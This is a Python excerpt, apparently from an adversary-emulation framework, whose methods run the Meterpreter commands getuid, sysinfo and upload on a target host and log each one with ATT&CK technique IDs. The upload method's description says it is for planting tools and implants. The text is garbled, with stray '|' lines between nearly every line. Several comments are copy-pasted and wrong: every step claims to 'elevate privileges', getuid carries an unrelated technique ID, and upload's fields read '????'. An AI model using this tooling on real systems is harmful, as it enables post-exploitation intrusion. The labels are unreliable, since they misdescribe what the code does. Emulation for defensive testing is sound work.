def getuid(self, target):
|
|
|
|
|
""" Returns the UID
|
|
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = "getuid"
|
|
|
|
|
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res[0]
|
|
|
|
|
|
|
|
|
|
def sysinfo(self, target):
|
|
|
|
|
""" Returns the sysinfo
|
|
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = "sysinfo"
|
|
|
|
|
ttp = "T1082" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res[0]
|
|
|
|
|
|
|
|
|
|
def upload(self, target, src, dst, **kwargs):
|
|
|
|
|
""" Upload file from metasploit controller to target
|
|
|
|
|
|
|
|
|
|
@param src: source file name on metasploit controller
|
|
|
|
|
@param dst: destination file name on target machine
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = f"upload {src} '{dst}' "
|
|
|
|
|
ttp = "????" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
tactics = "???"
|
|
|
|
|
tactics_id = "???"
|
|
|
|
|
description = """
|
|
|
|
|
Uploading new files to the target. Can be config files, tools, implants, ...
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
name="upload",
|
|
|
|
|
description=description,
|
|
|
|
|
tactics=tactics,
|
|
|
|
|
tactics_id=tactics_id,
|
|
|
|
|
situation_description=kwargs.get("situation_description",
|
|
|
|
|
None),
|
|
|
|
|
countermeasure=kwargs.get("countermeasure", None)
|
|
|
|
|
)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
logid=logid)
|
|
|
|
|
return res
|
